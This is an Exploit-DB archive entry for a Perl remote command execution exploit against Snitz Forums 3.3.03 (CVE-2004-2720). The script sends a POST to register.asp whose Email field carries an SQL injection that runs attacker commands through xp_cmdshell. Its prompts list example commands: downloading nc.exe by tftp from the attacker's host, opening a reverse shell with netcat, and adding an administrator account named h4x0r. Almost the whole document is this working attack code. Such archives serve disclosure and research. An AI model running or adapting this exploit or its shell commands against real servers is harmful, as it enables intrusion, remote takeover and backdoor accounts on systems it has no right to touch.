Snitz Forums 3.3.03 - Remote Command Execution Exploit

2003-05-12T00:00:00
ID EDB-ID:30
Type exploitdb
Reporter N/A
Modified 2003-05-12T00:00:00

Description

Snitz Forums 3.3.03 Remote Command Execution Exploit. CVE-2004-2720. Remote exploit for windows platform

                                        
                                            #!/usr/bin/perl

use Socket;

print "\nRemote command execution against Snitz Forums 3.3.03 (and probably others).\n";
print "You accept full responsibility for your actions by using this script.\n";
print "INTERNAL USE ONLY!! DO NOT DISTRIBUTE!!\n";

print "\nWeb server? [www.enterthegame.com]: ";
my $webserver = <STDIN>;
chomp $webserver;
if( $webserver eq "" )
{
$webserver = "www.enterthegame.com";
}

print "\nWeb server port? [80]: ";
my $port = <STDIN>;
chomp $port;
if( $port eq "" )
{
$port = 80;
}

print "\nAbsolute path to \"register.asp\"? [/forum/register.asp]: ";
my $path = <STDIN>;
chomp $path;
if( $path eq "" )
{
$path = "/forum/register.asp";
}

print "\nCommand to execute non-interactively\n";
print " Example commands: tftp -i Your.IP.Here GET nc.exe\n";
print " nc.exe -e cmd.exe Your.IP.Here YourNetcatListeningPortHere\n";
print " or: net user h4x0r /add | net localgroup Administrators h4x0r /add\n";
print "Your command: ";
my $command = <STDIN>;
chomp $command;
$command =~ s/\ /\%20/g;

if( open_TCP( FILEHANDLE, $webserver, 80 ) == undef )
{
print "Error connecting to $webserver\n";
exit( 0 );
}
else
{
my $data1 = $path . "\?mode\=DoIt";
my $data2 = "Email\=\'\%20exec\%20master..xp_cmdshell\%20\'" . $command. "\'\%20--\&Name\=snitz";
my $length = length( $data2 );

print FILEHANDLE "POST $data1 HTTP/1.1\n";
if( $port == 80 )
{
print FILEHANDLE "Host: $webserver\n";
}
else
{
print FILEHANDLE "Host: $webserver:$port\n";
}
print FILEHANDLE "Accept: */*\n";
print FILEHANDLE "User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\n";
print FILEHANDLE "Keep-Alive: 300\n";
print FILEHANDLE "Referer: http:\/\/$webserver$path\?mode\=Register\n";
print FILEHANDLE "Content-Type: application/x-www-form-urlencoded\n";
print FILEHANDLE "Content-Length: $length\n\n";
print FILEHANDLE "$data2";

print "\nSQL injection command sent. If you are waiting for a shell on your listening\n";
print "netcat, hit \"enter\" a couple of times to be safe.\n\n";

close( FILEHANDLE );
}

sub open_TCP
{
my( $FS, $dest, $port ) = @_;

my $proto = getprotobyname( 'tcp' );
socket( $FS, PF_INET, SOCK_STREAM, $proto );
my $sin = sockaddr_in( $port, inet_aton( $dest ));
connect( $FS, $sin ) || return undef;

my $old_fh = select( $FS );
$| = 1;
select( $old_fh );
return 1;
}

# milw0rm.com [2003-05-12]